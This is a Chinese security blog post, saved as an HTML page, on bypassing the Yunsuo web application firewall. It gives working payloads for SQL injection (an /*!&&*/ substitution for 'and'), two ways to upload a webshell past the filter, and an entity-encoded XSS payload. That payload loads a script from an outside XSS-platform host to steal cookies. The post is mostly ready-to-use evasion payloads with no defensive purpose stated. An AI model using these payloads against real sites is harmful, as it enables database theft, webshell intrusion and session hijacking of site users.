<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="最新版本云锁bypass"><meta name="keywords" content="bypass"><meta name="author" content="gshell"><meta name="copyright" content="gshell"><title>最新版本云锁bypass | gshell's blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.4.0'
} </script><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="gshell's blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass"><span class="toc-number">1.</span> <span class="toc-text">最新版本云锁bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-sql%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.</span> <span class="toc-text">1-sql注入</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-number">1.2.</span> <span class="toc-text">2-文件上传</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-XSS"><span class="toc-number">1.3.</span> <span class="toc-text">3-XSS</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/bamao.jpg"></div><div class="author-info__name text-center">gshell</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">13</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">6</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">5</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">安全论坛</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.t00ls.net/">tools</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://forum.90sec.com/">90sec</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.freebuf.com/">freebuf</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.sec-in.com/">SecIN</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://bbs.pediy.com/">看雪</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://xz.aliyun.com/">先知</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.anquanke.com/">安全客</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://paper.seebug.org/">seebug</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.52bug.cn">吾爱漏洞</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.0-sec.org/">零组文库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.secpulse.com/">安全脉搏</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.shentoushi.top">渗透师</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://wiki.bylibrary.cn">白阁文库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://wooyun.laolisafe.com/">乌云漏洞库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.butian.net/">补天</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.vulbox.com/">漏洞盒子</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.bugbank.cn/">漏洞银行</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/blog-bg.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">gshell's blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">首页</a><a class="site-page" href="/archives">安全文章</a><a class="site-page" href="/tags">渗透测试</a><a class="site-page" href="/categories">安全研究</a><a class="site-page" href="/about">关于</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">最新版本云锁bypass</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-08-27</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/waf%E7%BB%95%E8%BF%87/">waf绕过</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h4 id="最新版本云锁bypass"><a href="#最新版本云锁bypass" class="headerlink" title="最新版本云锁bypass"></a>最新版本云锁bypass</h4><span id="more"></span>

<p>官网下载最新版云锁</p>
<p>最新版本：win_3.1.20.15</p>
<p>进程：</p>
<p>yunsuo_agent_daemon.exe    </p>
<p>yunsuo_agent_service.exe</p>
<p>应用防护，开启web防护</p>
<img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/1.png" width="1000">



<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/2.png"></p>
<h5 id="1-sql注入"><a href="#1-sql注入" class="headerlink" title="1-sql注入"></a>1-sql注入</h5><p>1’ union select 1,2–+</p>
<p>触发云锁防护</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/3.png"></p>
<p>云锁有默认防护和增强型防护</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/4.png"></p>
<p><strong>默认防护**</strong>：**</p>
<p><strong>1-SQL注入</strong></p>
<p>盲注，发现压根不拦截。</p>
<p>id=1’ and 1=1–+</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/5.png"></p>
<p>1’ and mid(user(),1,14)=’root@localhost’–+</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/6.png"></p>
<p>–identify-waf</p>
<p>盲注和报错注入都不拦截，所以默认防护肯定不行。</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/7.png"></p>
<p><strong>开启增强型防护：</strong></p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/8.png"></p>
<p>盲注已被拦截</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/9.png"></p>
<p>继续sqlmap</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/10.png"></p>
<p>仅仅扫出来一个时间注入，跑不出数据</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/11.png"></p>
<p>绕过云锁：</p>
<p>%26%26代替and即可绕过。</p>
<p>1’ /<em>!%26%26</em>/ mid(user(),1,14)=’root@localhost’–+</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/12.png"></p>
<h5 id="2-文件上传"><a href="#2-文件上传" class="headerlink" title="2-文件上传"></a><strong>2-文件上传</strong></h5><p>在云锁未开通文件防护白名单的情况下，</p>
<p><strong>绕过方法1：</strong></p>
<p>普通的一句话木马访问会被拦截，上传免杀一句话即可。</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/13.png"></p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/14.png"></p>
<p><strong>绕过方法2：</strong></p>
<p>上传2.txt写入一句话，上传boahan.php去包含2.txt</p>
<p>即可绕过</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/15.png"></p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/16.png"></p>
<h5 id="3-XSS"><a href="#3-XSS" class="headerlink" title="3-XSS"></a><strong>3-XSS</strong></h5><p>&lt;svg/onload=alert(1)&gt;被拦截</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/17.png"></p>
<p>绕过方式：</p>
<p>使用base64编码直接绕过弹框</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/18.png"></p>
<p>打cookie绕过方式:</p>
<p>%3Ciframe%20WIDTH%3D0%20HEIGHT%3D0%20srcdoc%3D%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%26%23x3C%3B%26%23x73%3B%26%23x43%3B%26%23x52%3B%26%23x69%3B%26%23x50%3B%26%23x74%3B%26%23x20%3B%26%23x73%3B%26%23x52%3B%26%23x43%3B%26%23x3D%3B%26%23x22%3B%26%23x68%3B%26%23x74%3B%26%23x74%3B%26%23x70%3B%26%23x73%3B%26%23x3A%3B%26%23x2F%3B%26%23x2F%3B%26%23x78%3B%26%23x73%3B%26%23x73%3B%26%23x2E%3B%26%23x70%3B%26%23x74%3B%26%23x2F%3B%26%23x63%3B%26%23x71%3B%26%23x56%3B%26%23x36%3B%26%23x22%3B%26%23x3E%3B%26%23x3C%3B%26%23x2F%3B%26%23x73%3B%26%23x43%3B%26%23x72%3B%26%23x49%3B%26%23x70%3B%26%23x54%3B%26%23x3E%3B%3E</p>
<p><img src="/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/19.png"></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">gshell</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://www.gsheller.top/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/">http://www.gsheller.top/2020/08/27/%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E4%BA%91%E9%94%81bypass/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://www.gsheller.top">gshell's blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/bypass/">bypass</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/09/04/ngnix%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%EF%BC%88phpstudy%E6%9C%80%E6%96%B0%E7%89%88%EF%BC%89/"><i class="fa fa-chevron-left">  </i><span>ngnix解析漏洞（phpstudy最新版）</span></a></div><div class="next-post pull-right"><a href="/2020/08/26/%E6%9C%80%E6%96%B0%E7%89%88%E5%AE%89%E5%85%A8%E7%8B%97bypass/"><span>最新版安全狗bypass</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(/blog-bg.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2021 By gshell</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">低调行进，潜习安全</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>